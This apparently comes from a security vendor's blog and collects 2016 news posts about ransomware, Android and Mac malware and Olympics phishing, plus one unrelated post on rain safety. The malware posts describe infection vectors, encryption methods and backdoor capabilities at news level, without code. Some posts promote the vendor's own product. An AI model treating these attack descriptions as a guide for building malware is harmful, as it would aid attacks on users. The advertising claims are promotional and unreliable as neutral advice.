JagerDecryptor-another ransomware

jagger

Another ransomware JagerDecrypto has been found. Once the ransomware has infected a system, it will generate a new AES-256 key for each file it encrypts. This AES key is encrypted with RSA and appended to the end of the file along with the AES IV and other information. Of particular interest, any encrypted file will have “!ENC” as the first 4 bytes of the file.

Victims are presented with the above file “Important_Read_Me.html” for the ransom note, and asked to email the criminals at smartfiles9@yandex.com.

These folders are excluded: Application Data, AppData, Program Files (x86), Program Files, Temp, $Recycle.Bin, System Volume Information, Boot, Windows, ProgramData.

Ranscam doesn’t care if you pay the ransom-deletes files anyways

One of the latest pieces such low-budget malware to come down the pike is called Ranscam. Unlike traditional ransomware, which locks up a computer’s files and then demands a bitcoin payment, Ranscam infects a computer, deletes the files and then demands a payment from the victim even though the files are gone and cannot be recovered.

The first thing users will see after the malware has found its way into their system is the ransom note. It looks like the ransom notes that other pieces of ransomware show, but with one seemingly insignificant difference. Instead of directing users to an external location where they are supposed to verify the ransom payment, this note shows a clickable button: “I made payment, please verify.”

ranscam

In reality, the difference is very significant. Whenever a user clicks the button, a message appears, saying the payment was not verified and that one file will be deleted each time the button is pressed without the criminals behind Ranscam having been paid. That is probably supposed to make users nervous and persuade them to pay several times.

There is no way to get back the files deleted by Ranscam; the only way to protect yourself is to be proactive. So we recommend that you don’t open attachments and don’t follow suspicious links. Not much is known about how Ranscam spreads, but the usual suspects are e-mail attachments and malicious or hacked websites. So if you aren’t 100% sure, don’t click.

Back up your data regularly and store the backups on an offline storage device. If some ransomware encrypts or deletes your files, you’re covered.

Use a good Total Security program such as Max Total Security which gives you good anti virus, firewall and backup program.

Rain Rain Go Away-Some Tips

rain

Not really, we do not want rain to go away, after so much wait, drought years , we have good rain this year, but we need to be extremely careful indoors as well as outdoors.

Planning ahead:

1. Get Weather news: The best way to avoid lightning, flash floods, and other dangerous conditions is by not being in danger in the first place. Many ways are available to gain weather information like Watching current weather forecasts on TV or the internet or newspaper.
2. Inspect your vehicle
Make sure your windshield wipers are working correctly, and replace cracked or poor ones.
3. Allow extra time
Traffic congestion is worse in bad weather. Plan ahead and leave early so you have enough time to get to your destination.
4. Slow Down
When it rains, oil and grime on the pavement rise to the surface. Wet streets are extremely slick and slippery, making it more difficult to get traction. When you drive slowly, a greater amount of the tire’s tread makes contact with the road, giving you better traction. Drive at a steady pace and avoid jerky movements when braking, accelerating, or turning.
4. Don’t Tailgate
It takes three times longer to stop on a wet road than a dry one. Increase the distance you normally keep from the car in front of you and be alert for brake lights ahead.
5. Downed Power Lines:
If a power line comes in contact with your vehicle while you are inside, STAY in your car. Wait for help to arrive and honk the horn to attract attention. If other imminent dangers force you to leave the vehicle, do NOT touch the vehicle and the ground at the same time. You should jump out and land with both feet together. Continue to shuffle or hop with both feet till you are at least 50 feet away from your car.
6. Don’t take pictures/Selfies!
Dying to capture the surreal beauty of that thundercloud or show the folks back home what a haboob looks like? Wait till you’re off the road before you snap that picture. When you’re driving, focus on the road and keep both hands on the wheel.

Indoor Safety

1. Never touch wiring during a thunderstorm. It’s too late to unplug electronics if thunder is heard.
2. Corded phones are dangerous during thunderstorms. Lightning traveling through telephone wires has killed people. Cell phone and cordless phones are safe.
3. Wait to use any plumbing-sinks, showers, tubs, and toilets. Plumbing can conduct electricity from lightning strikes from outside.
4. Unplug expensive electronics including TV, stereo, home entertainment centers, and computers modem lines when thunderstorms are expected, and before the storm arrives. Typically, summer thunderstorms form in the early to mid-afternoon, when most people are at work.
5. Stop playing video games connected to the TV.

Pokemon GO

pokymongo

New mobile game “Pokemon Go” has become the hottest iPhone and Android game to hit the market in forever with enormous popularity and massive social impact. The app has taken the world by storm since its launch this week but also played a role in armed robberies in Missouri, the discovery of a body in Wyoming and minor injuries to fans distracted by the app and to top it all Malware infected apks too..

Nintendo’s new location-based augmented reality game allows players to catch Pokémon in the real life using their device’s camera and is currently only officially available in the United States, New Zealand, UK and Australia. Five days after its release, the game now is on more Android phones than dating app Tinder, snapchat and its rate of daily active users was neck and neck with social network Twitter, according to analytics firm SimilarWeb.

Due to the huge interest surrounding Pokémon Go, many gaming and tutorial websites have offered tutorials recommending users to download the APK from a non-Google Play link. In order to download the APK, users are required to “side-load” the malicious app by modifying their Android core security settings, allowing their device’s OS to install apps from “untrusted sources.”

It is discovered an infected Android version of the newly released mobile game Pokemon GO [1]. This specific APK was modified to include the malicious remote access tool (RAT) called DroidJack (also known as SandroRAT), which would virtually give an attacker full control over a victim’s phone.

A simple method to check if a device is infected would be to check the installed application’s permissions, which can typically be accessed by first going to Settings -> Apps -> Pokemon GO and then scrolling down to the PERMISSIONS section.

To do so, Go to the Settings → Apps → Pokemon GO and check the game’s permissions.
If you find that the game has asked for permissions like directly call phone numbers, edit and read your SMSes, record audio, read Web history, modify and read your contacts, read and write call logs, and change network connectivity, then you should uninstall the game right away, since it is infected with DroidJack.

Bottom line, just because you can get the latest software on your device does not mean that you should. Instead, downloading available applications from legitimate app stores is the best way to avoid compromising your device and the networks it accesses.

HummingBad Android malware: is your device infected?

hummingbad

The same group of cybercriminals behind a strain of iOS malware uncovered last year have apparently diversified and now dabble in Android malware. The group, dubbed Yingmob, has been running a malware campaign named HummingBad that controls 10 million Android devices globally and rakes in $300,000 a month.

Researchers revealed that a Chinese advertising company had created one of the most pernicious pieces of Android malware yet, they estimated it has infected 10m Android handsets worldwide. Be on you guard … HummingBad can do virtually anything the attacker wants, from spying on your personal information to stealing your bank login details.

The main purpose of the HummingBad malware is to trick users into clicking on mobile and web ads, which generates advertising revenue for its parent company, Yingmob – a practice known as “clickfraud”. It’s a lot like the browser toolbars designed to deliver ads to your computer a decade ago.

The malware is rooting hundreds of devices daily Sometimes the malware is unsuccessful at rooting those infected devices, but not always. As far as the ad fraud campaign goes, it really does it all: HummingBad displays ads – more than 20 million per day, creates clicks – more than 2.5 million per day, and installs bogus apps – more than 50,000 per day.

Malware gains “root access” to Android – the very heart of your phone’s operating system – and then calls home to a server controlled by Yingmob, it could be used to do virtually anything the attacker wants it to do, from spying on your personal information to stealing your bank login details. Even if the creators of the malware right now only use it for click fraud, they could decide to sell the rootkit on the internet’s black market.

Most people probably got infected because they installed a less-than-hygienic app from a third-party Android store or website. The vast majority of the 10m infected handsets reside in China and India, indicating third-party app stores – which are far more popular overseas – as the most likely sources. But around 250,000 are based in the US, so could be people who are traveling from Asia to the US, or simply people who ignore Android’s default settings and allow app installs from third-party sites.

You need to install a good Mobile Security for Android such
Max Total Security -Android
  to detect this malware and protect it from
other malware.

Cyber Criminals Using Rio Olympics to Target Users with Phishing Scams

rio2016

The Olympics are right around the corner, and the world will turn its attention to Rio de Janeiro for the Games of the XXXI Olympiad better known as the Summer Olympics in Rio. Unfortunately, the cybercriminals know this and are getting ready for the Olympics as well. Scammers are registering domains that contain these terms: “Rio” and “rio2016.” They are also buying low-cost SSL certificates so as to ensure that their fake websites appear authentic and trusted to the users. Phish websites imitating ticket sale services have turned out to be the most effective of all the scams directed towards innocent users until now.

It’s not only end-users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising the direct sales of tickets without applications to the official lotteries, that take place for people living in Brazil.

We warn readers to be careful and don’t fall for such scams and expect an increase in such scam emails as the Rio Olympics will be gearing up in August 2016.

New Malware Uses Tor to Open Backdoor on Mac OS X Systems

The malware’s technical name is Backdoor.MAC.Eleanor, and currently, its creators are distributing it to victims as EasyDoc Converter, a Mac app that allows users to convert files by dragging them over a small window.

Backdoor.MAC.Eleanor creates a .onion address for your Mac. The Tor service will automatically connect the infected computer to the Tor network, and generate a .onion domain through which the attacker can access the user’s system using only a browser.

The PHP Web service is the receiving end of that connection, being also tasked with interpreting the commands it receives from the crook’s control panel to the local Mac operating system.

Backdoor provides a lot of remote management options. Additionally, the attackers can also list locally running apps, use the infected computer to send emails, use it as an intermediary point to connect and administer databases, and scan remote firewalls for open ports.

The infected computer basically becomes a bot in the crook’s botnet, which can at any time use it to send out massive spam campaigns, steal sensitive data from the infected system, use it as a DDoS bot, or install other malware.

Below is an image of what the crook sees when accessing your Mac’s Tor .onion link.

elenaor

The application name is EasyDoc Converter.app, and its main functionality should be to
convert documents, but it does anything but that. Instead, it silently installs a backdoor in the system that gives the attacker full access to the operating system, tofile explorer, shell execution, webcam image and video capture and more. The
application is created using Platypus, a tool used for native MAC apps from shell, Perl, Python or Ruby scripts (http://sveinbjorn.org/platypus)

easydoc

MIRCOP Crypto-Ransomware

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document requests users to enable macros to be able to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.

The following screen is showed to the victim, suggesting that the victim has stolen 48.48BTC from a hacktivist group.

mircop-note

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any.

MIRCOP demands users to pay the ransom amount of 48.48 bitcoins (US$ 28,730.70 as of June 23, 2016), which is among the highest demands we have seen. And at the end of the note, the author leaves a bitcoin address. Unlike other ransomware notes where victims are instructed step-by-step on how to make the payment, MIRCOP suggests that the victim is familiar with making bitcoin transactions.

RockLoader Delivers New Bart Encryption Ransomware

A new ransomware by the name Bart is spreading. Victim’s files are encrypted by use of third-party software to compress each file into a password-protected ZIP file, and appends the extension “.bart.zip”. It appears this ransomware is spread by the same vectors as Locky, and appears to mimic it.

The following ransom note is displayed below, and is saved to the desktop as “recovery.txt”.

bart-2

The messages in this campaign had the subjects “Photos” with the attachment “photos.zip”, “image.zip”, “Photos.zip”, “photo.zip”, “Photo.zip”, or “picture.zip.” The zip files contained JavaScript file such as “PDF_123456789.js.

bart-1

Files are encrypted similar to files below:

bart3

The ransom note urges the user to visit a payment portal in order to pay 3 bitcoins (just under $2000 at current exchange rates). The payment portal is similar to the one used by Locky ransomware. By harnessing the skill and judgment of empowered users, an organization can bolster its defenses against malware threats delivered via phishing email.

Overlay Malware spreading via SMS phishing in Europe on Android devices

Overlay malware is a criminal’s Swiss Army Knife. It’s flexible and effective at stealing financial credentials as well as a multitude of other types of sensitive data on an Android device. Overlay malware botnets are expected to proliferate due to to the malware’s proven ability to effectively steal financial credentials alongside other authentication and customer data from mobile devices.

Threat actors typically first setup the command and control (C2) servers and malware hosting sites, then put the malware apps on the hosting sites and send victims SMS messages with an embedded link that leads to the malware app. After landing on the user’s device, the malware launches a process to monitor which app is running in the foreground on the compromised device. When the user launches a benign app into the foreground that the malware is programmed to target (such as a banking app), the malware overlays a phishing view on top of the benign app. The unwary user, assuming that they are using the benign app, will enter the required account credentials, which are then sent to remote C2 servers controlled by threat actors.

Smishing (SMS phishing) offers a unique vector to infect mobile users. The latest Smishing campaigns spreading in Europe show that Smishing is still a popular means for threat actors to distribute their malware. In addition, threat actors have been using diversified host schemes and different C2 servers, and have been continuously refining their malicious code to keep infecting more users and evade detection.

To protect against these threats, users should not install apps from outside official app stores, and take caution before clicking any links where the origin is unclear.